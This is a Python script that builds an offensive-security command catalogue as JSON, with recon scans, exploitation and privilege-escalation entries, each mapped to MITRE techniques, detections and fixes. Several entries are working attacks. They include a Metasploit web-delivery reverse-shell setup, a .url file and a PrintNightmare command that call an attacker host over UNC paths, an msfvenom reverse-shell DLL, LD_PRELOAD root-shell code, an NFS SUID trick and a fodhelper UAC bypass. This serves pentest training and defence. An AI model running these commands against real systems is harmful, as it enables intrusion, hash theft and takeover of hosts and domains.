#!/usr/bin/env python3
"""Batch 5 — pushing toward 300."""
import json
from pathlib import Path
OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"

def e(id,tool,cat,phase,os,cmd,name,desc,args,output,use_case,prereqs,mitre,tactic,detections,remediation,mistakes,alts,refs,tags):
    return {"id":id,"tool":tool,"category":cat,"phase":phase,"os":os,"command":cmd,"name":name,"description":desc,"arguments":args,"expected_output":output,"use_case":use_case,"prerequisites":prereqs,"mitre_mapping":mitre,"mitre_tactic":tactic,"detections":detections,"remediation":remediation,"common_mistakes":mistakes,"alternatives":alts,"references":refs,"tags":tags}

L=["linux"];LW=["linux","windows"];LWM=["linux","windows","macos"];W=["windows"]

# ===================== RECON EXTRAS (10) =====================
R5=[
e("nmap-script-banner","nmap","reconnaissance",1,LWM,"nmap --script banner -p 1-10000 <target>","Banner Grabbing (All Ports)","Grabs service banners from all open ports — reveals software versions and custom messages.",{"--script banner":"Grab banners","-p 1-10000":"First 10000 ports"},"| banner: SSH-2.0-OpenSSH_8.9p1\n| banner: 220 ProFTPD 1.3.5","Identify services by their banners — sometimes reveals internal hostnames or version info.",["Open ports"],["T1046"],"Discovery",["Banner grab connections"],["Customize banners to hide version info"],["Not checking high ports"],["nc -v <target> <port>","telnet"],["https://nmap.org/nsedoc/scripts/banner.html"],["banner","version","identification","service"]),
e("nmap-script-ssl-cert","nmap","reconnaissance",1,LWM,"nmap --script ssl-cert -p 443 <target>","SSL Certificate Information","Extracts SSL certificate details — issuer, subject, SANs, expiry dates.",{"--script ssl-cert":"Get certificate info"},"| Subject: CN=*.target.com\n| Issuer: Let's Encrypt\n| SANs: target.com, api.target.com, mail.target.com\n| Not valid after: 2024-06-01","Discover additional hostnames from certificate SANs and check for expired certs.",["HTTPS port open"],["T1596.002"],"Reconnaissance",["SSL probing"],["Keep certificates updated","Use proper SANs"],["Not checking SANs for additional subdomains"],["openssl s_client","testssl.sh"],["https://nmap.org/nsedoc/scripts/ssl-cert.html"],["ssl","certificate","san","subdomain","expiry"]),
e("nuclei-exposure","nuclei","reconnaissance",1,LWM,"nuclei -u http://<target> -t exposures/ -severity info,low,medium","Sensitive Exposure Detection","Detects exposed sensitive files, directories, and information leaks.",{"-t exposures/":"Exposure detection templates"},"[info] [git-config] http://target/.git/config\n[low] [env-file] http://target/.env\n[medium] [phpinfo] http://target/phpinfo.php","Find accidentally exposed configuration files, git repos, and debug info.",["Web server accessible"],["T1552"],"Credential Access",["Access to sensitive paths"],["Remove sensitive files","Restrict access","Use .htaccess"],["Not checking all common paths"],["ffuf with sensitive wordlist","dirsearch"],["https://github.com/projectdiscovery/nuclei-templates"],["exposure","sensitive","git","env","config"]),
e("gospider-crawl","gospider","reconnaissance",1,L,"gospider -s http://<target> -d 3 -c 10 --other-source --include-subs","GoSpider Web Crawler","Fast web crawler that extracts URLs, JavaScript files, and form actions.",{"-s":"Start URL","-d 3":"Depth","-c 10":"Concurrency","--other-source":"Include Wayback/CommonCrawl","--include-subs":"Include subdomains"},"[url] http://target/api/v2/users\n[javascript] http://target/static/app.js\n[form] http://target/login POST","Discover endpoints, JS files (for secrets), and forms for testing.",["Web server accessible"],["T1595"],"Reconnaissance",["High crawl rate"],["Rate limiting","robots.txt"],["Not extracting secrets from JS files"],["katana","hakrawler","burp spider"],["https://github.com/jaeles-project/gospider"],["crawler","spider","javascript","endpoints","active"]),
e("dnsx-resolve","dnsx","reconnaissance",1,L,"cat subdomains.txt | dnsx -silent -a -resp","DNS Resolution (Bulk)","Resolves a list of subdomains to IPs — filters out dead/non-resolving entries.",{"-silent":"Only output","-a":"A records","-resp":"Show response"},"api.target.com [10.0.0.5]\nwww.target.com [10.0.0.1]\ndev.target.com [10.0.0.10]","Filter subdomain lists to only live, resolving hosts before further testing.",["Subdomain list"],["T1590"],"Reconnaissance",["Bulk DNS queries"],["N/A"],["Not checking for wildcard DNS"],["massdns","puredns"],["https://github.com/projectdiscovery/dnsx"],["dns","resolve","bulk","filter","alive"]),
]

# ===================== MORE EXPLOITATION (15) =====================
EX5=[
e("msfconsole-web-delivery","metasploit","exploitation",5,L,"msfconsole -q -x 'use exploit/multi/script/web_delivery; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ip>; exploit'","Web Delivery (Fileless)","Hosts a payload on HTTP and generates a one-liner for fileless execution on target.",{"target 2":"PowerShell delivery","LHOST":"Attacker IP"},"[*] Run the following on target:\npowershell.exe -nop -w hidden -e <base64>","Deliver payloads without writing to disk — evades some AV.",["Target can reach attacker HTTP","PowerShell available"],["T1059.001"],"Execution",["PowerShell encoded command execution","Outbound HTTP to unusual host"],["Constrained Language Mode","Script block logging","AMSI"],["Target can't reach attacker","AMSI blocks payload"],["python web_delivery","regsvr32 delivery"],["https://docs.metasploit.com"],["fileless","powershell","delivery","evasion"]),
e("msfconsole-local-exploit","metasploit","exploitation",5,L,"msfconsole -q -x 'use exploit/linux/local/cve_2021_4034_pwnkit; set SESSION 1; exploit'","Local Privilege Escalation (PwnKit)","Exploits CVE-2021-4034 (PwnKit/pkexec) for instant root on unpatched Linux.",{"use exploit/linux/local/...":"Local exploit module","SESSION":"Existing meterpreter session"},"[+] Root shell obtained!\nmeterpreter > getuid\nServer username: root","Escalate from user to root using kernel/SUID exploits via Metasploit.",["Existing session on target","Vulnerable kernel/binary"],["T1068"],"Privilege Escalation",["pkexec execution","Unusual privilege changes"],["Patch CVE-2021-4034","Remove pkexec SUID"],["Target already patched"],["manual pwnkit exploit","linpeas (suggests exploits)"],["https://docs.metasploit.com"],["pwnkit","local-exploit","privilege-escalation","cve"]),
e("responder-ntlm-theft","responder","exploitation",5,L,"# Create malicious .url file:\n[InternetShortcut]\nURL=\\\\<attacker_ip>\\share\n# Place in writable share, wait for user to browse folder","NTLM Hash Theft (File)","Creates files that force NTLM authentication when a user browses the containing folder.",{"[InternetShortcut]":"URL file format","\\\\attacker\\share":"UNC path triggers auth"},"[+] NTLMv2 Hash captured: CORP\\j.smith:...","Steal NTLM hashes by placing malicious files in shares users browse.",["Writable share","Responder running"],["T1187"],"Credential Access",["Outbound SMB to unusual host","File creation in shares"],["Disable NTLM","SMB signing","Monitor share file creation"],["Users don't browse the share"],[".scf files","desktop.ini","ntlm_theft tool"],["https://github.com/lgandx/Responder"],["ntlm","theft","file","share","hash-capture"]),
e("printnightmare","cve","exploitation",5,L,"python3 CVE-2021-1675.py <domain>/<user>:<pass>@<target> '\\\\<attacker>\\share\\evil.dll'","PrintNightmare Exploit","Exploits Windows Print Spooler vulnerability for remote code execution as SYSTEM.",{"CVE-2021-1675.py":"Exploit script","\\\\attacker\\share\\evil.dll":"Malicious DLL to load"},"[+] DLL loaded successfully\n[+] SYSTEM shell obtained","Remote code execution on unpatched Windows via Print Spooler — very impactful.",["Print Spooler running","Valid credentials","SMB share hosting DLL"],["T1210"],"Lateral Movement",["Print Spooler errors","DLL loading from UNC path","New driver installation"],["Disable Print Spooler where not needed","Patch CVE-2021-1675"],["Print Spooler disabled","Already patched"],["SharpPrintNightmare","Invoke-Nightmare"],["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675"],["printnightmare","print-spooler","rce","cve","critical"]),
e("zerologon","cve","exploitation",5,L,"python3 zerologon_tester.py <dc_name> <dc_ip>","Zerologon (CVE-2020-1472)","Tests for Zerologon vulnerability — allows setting DC machine account password to empty.",{"<dc_name>":"DC NetBIOS name","<dc_ip>":"DC IP address"},"[+] DC is VULNERABLE to Zerologon!\n[+] Machine account password can be set to empty","Critical vulnerability — instant domain compromise by zeroing DC machine account password.",["Network access to DC (port 135)","Unpatched DC"],["T1210"],"Lateral Movement",["Netlogon authentication anomalies","DC machine account password change"],["Patch CVE-2020-1472","Monitor Netlogon traffic"],["DC already patched (most are by now)"],["mimikatz zerologon","netexec -M zerologon"],["https://www.secura.com/blog/zero-logon"],["zerologon","cve","domain-compromise","critical","dc"]),
]

# ===================== MORE PRIVESC (10) =====================
PE5=[
e("linux-ld-preload","manual","privilege_escalation",6,L,"# If sudo allows env_keep+=LD_PRELOAD:\ngcc -shared -fPIC -o /tmp/pe.so pe.c && sudo LD_PRELOAD=/tmp/pe.so <allowed_command>","LD_PRELOAD Privilege Escalation","If sudo preserves LD_PRELOAD, inject a shared library that spawns root shell.",{"LD_PRELOAD":"Preload shared library before execution"},"# pe.c:\nvoid _init() { setuid(0); system(\"/bin/bash\"); }\n# Result: root shell","Exploit sudo env_keep with LD_PRELOAD to escalate to root.",["sudo -l shows env_keep+=LD_PRELOAD","Allowed sudo command"],["T1574.006"],"Privilege Escalation",["Unusual LD_PRELOAD usage","Shared library loading"],["Remove LD_PRELOAD from env_keep","Use env_reset in sudoers"],["env_keep doesn't include LD_PRELOAD"],["linpeas (checks automatically)"],["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation"],["ld-preload","sudo","shared-library","environment"]),
e("linux-nfs-no-root-squash","showmount","privilege_escalation",6,L,"# If NFS export has no_root_squash:\nmount -t nfs <target>:/share /mnt\ncp /bin/bash /mnt/bash && chmod +s /mnt/bash\n# On target: /share/bash -p","NFS no_root_squash Exploit","If NFS share has no_root_squash, create SUID binary on share for root access.",{"no_root_squash":"Root on client = root on server","chmod +s":"Set SUID bit"},"# On target:\n$ /share/bash -p\nbash-5.1# whoami\nroot","Exploit NFS misconfiguration — root on your machine = root on the NFS share.",["NFS share with no_root_squash","Can mount the share"],["T1548"],"Privilege Escalation",["SUID binary creation on NFS","Mount from unusual client"],["Use root_squash (default)","Restrict NFS client IPs"],["Share uses root_squash (default)"],["linpeas","showmount -e"],["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration"],["nfs","no-root-squash","suid","mount","privesc"]),
e("windows-dll-hijack","manual","privilege_escalation",6,W,"# Find DLL search order vulnerability:\n# 1. procmon.exe → filter: Result=NAME NOT FOUND, Path ends with .dll\n# 2. Place malicious DLL in writable search path\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f dll -o hijack.dll","DLL Hijacking","Exploits Windows DLL search order — place malicious DLL where application looks first.",{"procmon":"Find missing DLLs","msfvenom -f dll":"Generate malicious DLL"},"# Application loads our DLL → reverse shell as application's user","Escalate privileges by hijacking DLL loading in privileged applications.",["Writable directory in DLL search path","Application loading missing DLL"],["T1574.001"],"Privilege Escalation",["New DLL in application directory","DLL loading from unusual path"],["Use full DLL paths","Restrict directory permissions","Enable SafeDllSearchMode"],["DLL not in writable path","Wrong architecture"],["PowerUp Find-PathDLLHijack","winPEAS"],["https://book.hacktricks.wiki/en/windows-hardening/privilege-escalation/dll-hijacking"],["dll","hijack","search-order","windows","privesc"]),
e("windows-printspoofer","printspoofer","privilege_escalation",6,W,"PrintSpoofer.exe -i -c cmd","PrintSpoofer (SeImpersonate)","Exploits SeImpersonatePrivilege via Print Spooler to get SYSTEM — works on modern Windows.",{"-i":"Interactive","-c cmd":"Command to run as SYSTEM"},"C:\\>whoami\nnt authority\\system","Modern potato exploit — works on Windows 10/Server 2019 where JuicyPotato fails.",["SeImpersonatePrivilege (service accounts)"],["T1134"],"Privilege Escalation",["Print Spooler pipe creation","Token impersonation events"],["Remove SeImpersonatePrivilege","Disable Print Spooler"],["SeImpersonate not available"],["GodPotato","SweetPotato","JuicyPotato"],["https://github.com/itm4n/PrintSpoofer"],["printspoofer","seimpersonate","system","modern","potato"]),
e("windows-uac-bypass","manual","privilege_escalation",6,W,"# Using fodhelper.exe:\nreg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /d \"cmd.exe\" /f\nreg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /v DelegateExecute /t REG_SZ /f\nfodhelper.exe","UAC Bypass (fodhelper)","Bypasses User Account Control to run commands as high-integrity without UAC prompt.",{"reg add":"Set registry keys","fodhelper.exe":"Auto-elevating binary"},"# High-integrity cmd.exe opens without UAC prompt","Bypass UAC when you have admin credentials but UAC blocks elevation.",["Local admin account","UAC set to default (not Always Notify)"],["T1548.002"],"Privilege Escalation",["Registry modification in ms-settings","fodhelper spawning child process"],["Set UAC to Always Notify","Monitor auto-elevating binaries"],["UAC set to Always Notify"],["UACME (many bypass methods)","eventvwr.exe bypass"],["https://book.hacktricks.wiki/en/windows-hardening/privilege-escalation/uac-bypass"],["uac","bypass","fodhelper","elevation","windows"]),
]

def save(fn,data):
    path=OUTPUT_DIR/fn
    with open(path,'w') as f: json.dump(data,f,indent=2)
    print(f"  {fn}: {len(data)}")

if __name__=="__main__":
    print("Batch 5...")
    save("bulk5_recon.json",R5)
    save("bulk5_exploit.json",EX5)
    save("bulk5_privesc.json",PE5)
    total=0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp: total+=len(json.load(fp))
    print(f"\nTOTAL: {total}")
